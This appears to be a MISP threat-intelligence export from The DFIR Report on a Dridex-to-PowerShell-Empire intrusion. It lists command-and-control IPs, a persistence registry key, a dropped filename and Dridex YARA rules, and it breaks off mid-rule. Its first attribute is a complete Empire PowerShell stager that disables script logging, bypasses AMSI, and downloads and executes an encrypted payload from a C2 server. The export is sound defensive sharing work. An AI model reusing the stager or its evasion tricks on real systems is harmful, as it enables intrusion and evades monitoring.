{
"Event": {
"analysis": "2",
"date": "2020-07-15",
"extends_uuid": "",
"info": "Dridex to Empire",
"publish_timestamp": "1596485147",
"published": true,
"threat_level_id": "3",
"timestamp": "1596485073",
"uuid": "946e7701-5bdd-4efe-ae94-a6626fc8092b",
"Orgc": {
"name": "The DFIR Report",
"uuid": "5e9e5d86-5b94-4ff6-b07e-4e3e950d210f"
},
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#10e874",
"name": "Powershell Empire"
},
{
"colour": "#0da700",
"name": "misp-galaxy:tool=\"Dridex\""
},
{
"colour": "#ffffff",
"name": "tlp:white"
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594842943",
"to_ids": true,
"type": "text",
"uuid": "22da835e-04f1-4e3d-9125-3dbbe3cb7541",
"value": "If($PSVERSiOnTaBlE.PSVERsIOn.MajOr -Ge 3){$GPF=[reF].AsseMbLy.GETTYpe('System.Management.Automation.Utils').\"GETFiE`ld\"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtVaLuE($nuLl);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vaL=[CoLLECtIONS.GeneRIC.DiCtIONArY[strING,SyStem.ObJeCT]]::nEW();$VAl.ADD('EnableScriptB'+'lockLogging',0);$VaL.Add('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptB'+'lockLogging']=$vaL}ElsE{[ScrIpTBlock].\"GetFIe`ld\"('signatures','N'+'onPublic,Static').SETValUE($NUll,(NEw-ObJect COLlecTiONs.GEneRic.HASHSet[sTrInG]))}[Ref].AsSEMbLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GeTFIelD('amsiInitFailed','NonPublic,Static').SETVAlue($null,$TRUe)};};[SYsTEM.NET.SerVIcEPoIntMaNAger]::ExPECt100CONTinuE=0;$Wc=New-ObJecT SYSTem.NET.WeBClIent;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wC.HeAdERs.ADD('User-Agent',$u);$WC.PrOXY=[SYsTEm.NET.WebREQuEst]::DeFaULTWeBProxY;$WC.PROxy.CrEDENtiAls = [SYSTeM.NeT.CREDENTIALCaChe]::DeFAULTNetWORkCREdenTialS;$Script:Proxy = $wc.Proxy;$K=[SYstEm.TExT.ENCOdiNG]::ASCII.GeTBYTES('b6dc9515bf3161700de268130726d162');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOR$S[($S[$I]+$S[$H])%256]}};$ser='https://194.99.22.145:443';$t='/login/process.php';$wC.HeADerS.ADD(\"Cookie\",\"session=TI47O5rucSxxojlrBjwysXKBrRQ=\");$DATA=$WC.DOWnLOADDatA($seR+$t);$iV=$daTA[0..3];$DATa=$daTA[4..$DaTA.LenGTh];-join[Char[]](& $R $DAta ($IV+$K))|IEX"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845135",
"to_ids": true,
"type": "ip-dst",
"uuid": "39f56fa9-58f9-4962-a4e9-809182990f7d",
"value": "194.99.22.145",
"Tag": [
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
},
{
"colour": "#10e874",
"name": "Powershell Empire"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845114",
"to_ids": true,
"type": "ip-dst",
"uuid": "acb0c1a9-45b9-4442-986b-d10c0b5808af",
"value": "64.118.8.15",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1594845109",
"to_ids": true,
"type": "ip-dst",
"uuid": "2b113678-6c5c-4f92-b747-5fcd46fb9268",
"value": "59.148.253.194",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Persistence mechanism",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1595298092",
"to_ids": true,
"type": "regkey",
"uuid": "ef331607-0a3d-4770-b9da-33708b3e1a10",
"value": "\\HKEY_USERS\\S-1-5-21-1761595937-4212512506-1431507687-12106\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Zvhlxdonjwfvei"
},
{
"category": "Payload installation",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1595298165",
"to_ids": true,
"type": "filename",
"uuid": "6593e1cf-db14-4c4d-a5e5-cda4d9e252e3",
"value": "%APPDATA%\\Microsoft\\SystemCertificates\\My\\CRLs\\swET\\bdechangepin.exe"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417742",
"to_ids": true,
"type": "ip-dst",
"uuid": "f9f88e60-774a-47dc-bbcc-09818cbf07a0",
"value": "2.58.16.87",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417742",
"to_ids": true,
"type": "ip-dst",
"uuid": "587aa626-f57e-444e-b1c1-ab3491f99a10",
"value": "144.168.239.42",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "3bbfd758-3b04-47ca-80c6-04566cd9f0e2",
"value": "216.52.109.40",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "da8a693e-6e63-4de8-a1ef-ef863052adb1",
"value": "88.129.221.43",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417741",
"to_ids": true,
"type": "ip-dst",
"uuid": "65837ca9-0bf6-4c22-92a4-72fde36d2cd4",
"value": "104.131.103.128",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "cad4c1c8-ad81-4869-841d-fc5b5176d8d6",
"value": "54.39.34.24",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "64479ecc-ab45-495c-875d-42a2b7b2ce92",
"value": "192.99.103.228",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417740",
"to_ids": true,
"type": "ip-dst",
"uuid": "c176ce15-acd2-4573-9991-8e19d4953c4f",
"value": "2.80.178.251",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596417619",
"to_ids": true,
"type": "ip-dst",
"uuid": "e2ddf6c7-40b0-4a89-8751-7525d4693c30",
"value": "75.170.61.45",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450057",
"to_ids": true,
"type": "ip-dst",
"uuid": "931290f5-12fd-493e-802f-4e9e132a6a0d",
"value": "199.66.90.63",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450034",
"to_ids": true,
"type": "ip-dst",
"uuid": "80882b5d-a04b-4963-a324-e9778acbaec6",
"value": "88.129.223.244",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596450009",
"to_ids": true,
"type": "ip-dst",
"uuid": "f1d301b8-3592-499e-b1b5-06c2d8e952d3",
"value": "209.74.126.2",
"Tag": [
{
"colour": "#ab022a",
"name": "Dridex"
},
{
"colour": "#e200a3",
"name": "kill-chain:Command and Control"
}
]
},
{
"category": "Artifacts dropped",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1596485073",
"to_ids": false,
"type": "yara",
"uuid": "984b5cd1-6311-49e9-b65f-d7c684bd28f6",
"value": "/*\r\n YARA Rule Set\r\n Author: The DFIR Report\r\n Date: 2020-07-29\r\n Identifier: dridex-yara\r\n Reference: https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\r\n*/\r\n\r\n/* Rule Set ----------------------------------------------------------------- */\r\n\r\nimport \"pe\"\r\n\r\nrule dridex_yara_ufo {\r\n meta:\r\n description = \"dridex-yara - file ufo.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"5761fd8b454c1121f80019ade53b0815bd0573dac89fe6ecd3198e7d756f1a3a\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"usersJRB\" fullword wide\r\n $s5 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s6 = \"2017,2uchannelsPYDudays\" fullword wide\r\n $s7 = \"torrespondedthanfshadow\" fullword wide\r\n $s8 = \"increasing.includeda7iexample,Hofgodzilla\" fullword wide\r\n $s9 = \"haveand2system-providedreleasenoneJgZtest,\" fullword wide\r\n $s10 = \"wsupport3voftenfromR\" fullword wide\r\n $s11 = \"tofwerentheFirefox.149simplerunstableqqinformation\" fullword wide\r\n $s12 = \"11.172.2.11\" fullword wide\r\n $s13 = \"Dinsettheir\" fullword wide\r\n $s14 = \"yofthe\" fullword wide\r\n $s15 = \"TLty2_J \" fullword ascii\r\n $s16 = \"CosZTX^&% \" fullword ascii\r\n $s17 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s18 = \"4vthethatfour-part\" fullword wide\r\n $s19 = \"GkaChrome\" fullword wide\r\n $s20 = \"L$<;D$<\" fullword ascii /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"e37c1c1a736faeeff7de27f075619f47\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_cannot_but_soft {\r\n meta:\r\n description = \"dridex-yara - file cannot_but_soft.xsl\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"f4b75d4ddcd7b9ff5d7f867d44e4b7236c69e26807b2ca8296df1981aaf336f6\"\r\n strings:\r\n $s1 = \"var a_couch_for = [\\\"love_is_by\\\",\\\"all_but_keep\\\",\\\"summons_i_th\\\",\\\"humanity_so_we\\\",\\\"thus_hath_fed\\\",\\\"and_stood_between\\\",\" wide\r\n $s2 = \"{var and_light_than = [\\\"tween_their_course\\\",\\\"ophelia_distracted\\\",\\\"marriage_and_both\\\",\\\"of_us_grant\\\",\\\"nor_eye_and\\\",\\\"hum\" wide\r\n $s3 = \"xmlns=\\\"http://www.w3.org/1999/XSL/Transform\\\" xmlns:ms=\\\"urn:schemas-microsoft-com:xslt\\\" \" fullword wide\r\n $s4 = \"while (among_a_father + then_this_be >= new Date().getTime()) {}}\" fullword wide\r\n $s5 = \"\" fullword wide\r\n $s6 = \"]]> \" fullword wide\r\n $s7 = \"\" fullword wide\r\n $s8 = \"{var among_a_father = new Date().getTime();\" fullword wide\r\n $s9 = \"it_so_mope(\\\"rundll32 \\\".concat(locks_to_all.concat(\\\" \\\".concat(\\\"DllRegisterServer\\\"))))\" fullword wide\r\n $s10 = \"xmlns:user=\\\"placeholder\\\" \" fullword wide\r\n $s11 = \"var locks_to_all = \\\"%WINDIR%\\Temp/\\\".concat(\\\"/\\\".concat(my_acquittance))\" fullword wide\r\n $s12 = \"{return leaves_in_his.readystate}\" fullword wide\r\n $s13 = \"function unproportion_d_no(leaves_in_his)\" fullword wide\r\n $s14 = \"run(for_s_purpose)}}\" fullword wide\r\n $s15 = \"version=\\\"1.0\\\">\" fullword wide\r\n $s16 = \"if(beast_so_as(call_it_an)=== 150+50 && unproportion_d_no(call_it_an) === 1+3)\" fullword wide\r\n $s17 = \"var lecture_and_polonius = \\\"wscript.\\\".concat(first_corse_again);\" fullword wide\r\n $s18 = \"with (now_it_profanely){\" fullword wide\r\n $s19 = \"{return of_his_solicitings.status}\" fullword wide\r\n $s20 = \"couplets_are_embark.close();\" fullword wide\r\n condition:\r\n uint16(0) == 0xfeff and filesize < 20KB and\r\n 8 of them\r\n}\r\n\r\n\r\nrule dridex_yara_marple {\r\n meta:\r\n description = \"dridex-yara - file marple.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"cb81e371e2a4d3371e051b1f15674ce6cb94e257d28ddc1a5209bb56c71dd27a\"\r\n strings:\r\n $s1 = \"vplD.dll\" fullword ascii\r\n $s2 = \"wtrter.dll\" fullword wide\r\n $s3 = \"self.exe\" fullword wide\r\n $s4 = \"RRR333\" fullword ascii /* reversed goodware string '333RRR' */\r\n $s5 = \"nProtect KeyCrypt Program Database DLL\" fullword wide\r\n $s6 = \"VVV&&&\" fullword ascii /* reversed goodware string '&&&VVV' */\r\n $s7 = \"PPPPP$\" fullword ascii /* reversed goodware string '$PPPPP' */\r\n $s8 = \"LIO.pdb\" fullword ascii\r\n $s9 = \"0!\\\"!!!\" fullword ascii\r\n $s10 = \"3930, 00, 0, 0\" fullword wide /* hex encoded string '90' */\r\n $s11 = \"))44)44'7+4)?\" fullword ascii /* hex encoded string 'DDt' */\r\n $s12 = \"=22222222=\" fullword ascii /* hex encoded string '\"\"\"\"' */\r\n $s13 = \"44==========-\" fullword ascii /* hex encoded string 'D' */\r\n $s14 = \"7733.--!&\" fullword ascii /* hex encoded string 'w3' */\r\n $s15 = \"#44##' {\" fullword ascii /* hex encoded string 'D' */\r\n $s16 = \"doqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoq\" fullword ascii\r\n $s17 = \"doqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoqdoq\" fullword ascii\r\n $s18 = \"xwxwwwwwxwxwwwwwxwx\" fullword ascii\r\n $s19 = \"wxwxwwwwwxwxwwwwwxwx\" fullword ascii\r\n $s20 = \"doqdoqdoqdoq\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 1000KB and\r\n ( pe.imphash() == \"b575de8cf342823d87afbf497885b43d\" and pe.exports(\"pfrBpdm16\") or 8 of them )\r\n}\r\n\r\nrule dridex_yara_123 {\r\n meta:\r\n description = \"dridex-yara - file 123.bin\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"e88dfd4bef8c502ef2b711fd025aa321244dbca1eab80586b07187b3cf261de3\"\r\n strings:\r\n $s1 = \"mfRgb.dll\" fullword ascii\r\n $s2 = \"TESTAPP.exe\" fullword wide\r\n $s3 = \"sself.exe\" fullword wide\r\n $s4 = \"j13KAGsE#btwkWcu#unto2!.jT4srFRP.pdb\" fullword ascii\r\n $s5 = \"11.172.2.11\" fullword wide\r\n $s6 = \"a}d+ #\" fullword ascii\r\n $s7 = \"Java(TM) Platform SE 8 U172\" fullword wide\r\n $s8 = \"Vxkc*P,BNG\" fullword ascii\r\n $s9 = \"Fpreferences,betweenpreviouslyX\" fullword wide\r\n $s10 = \"anLK'mT\" fullword ascii\r\n $s11 = \"LoMo?w\" fullword ascii\r\n $s12 = \"FSxH0P;:J\" fullword ascii\r\n $s13 = \"-ATXg3\\\"\" fullword ascii\r\n $s14 = \"OofPNsPoint\" fullword wide\r\n $s15 = \"qrKn!6\" fullword ascii\r\n $s16 = \"BinN$L\" fullword ascii\r\n $s17 = \"thepwithZthebar\" fullword wide\r\n $s18 = \"NyRaG@g\" fullword ascii\r\n $s19 = \"HgWVIbD\" fullword ascii\r\n $s20 = \"'JZCnX;}p{\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize < 600KB and\r\n ( pe.imphash() == \"261439292fcce3e9d2f6f3cdfbf610b2\" and pe.exports(\"mvbFp6\") or 8 of them )\r\n}\r\n\r\nrule dridex_yara_rvhz1 {\r\n meta:\r\n description = \"dridex-yara - file rvhz1.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/\"\r\n date = \"2020-07-29\"\r\n hash1 = \"076547c290c80627993690a9e6c15eeb2ac9b86a9a33af2d3dbaab135f1f43ab\"\r\n strings:\r\n $s1 = \"c:\\\\Cover\\\\particular\\\\Mind\\\\Difficult\\\\engine\\\\Tool\\\\Under.pdb\" fullword ascii\r\n $s2 = \"constructor or from DllMain.\" fullword ascii\r\n $s3 = \"3.2.4.465\" fullword wide /* hex encoded string '2De' */\r\n $s4 = \"576=6_6}6\" fullword ascii /* hex encoded string 'Wff' */\r\n $s5 = \":*:1:G:\\\\:b:k:r:\" fullword ascii\r\n $s6 = \":Q:V:\\\\:z:\" fullword ascii\r\n $s7 = \"xzRamj6\" fullword ascii\r\n $s8 = \"VVtW;' \" fullword ascii\r\n $s9 = \"History Kill Few\" fullword wide\r\n $s10 = \" 1999-2017 History Kill Few, Inc.\" fullword wide\r\n $s11 = \"hExpY^f\" fullword ascii\r\n $s12 = \"<'<9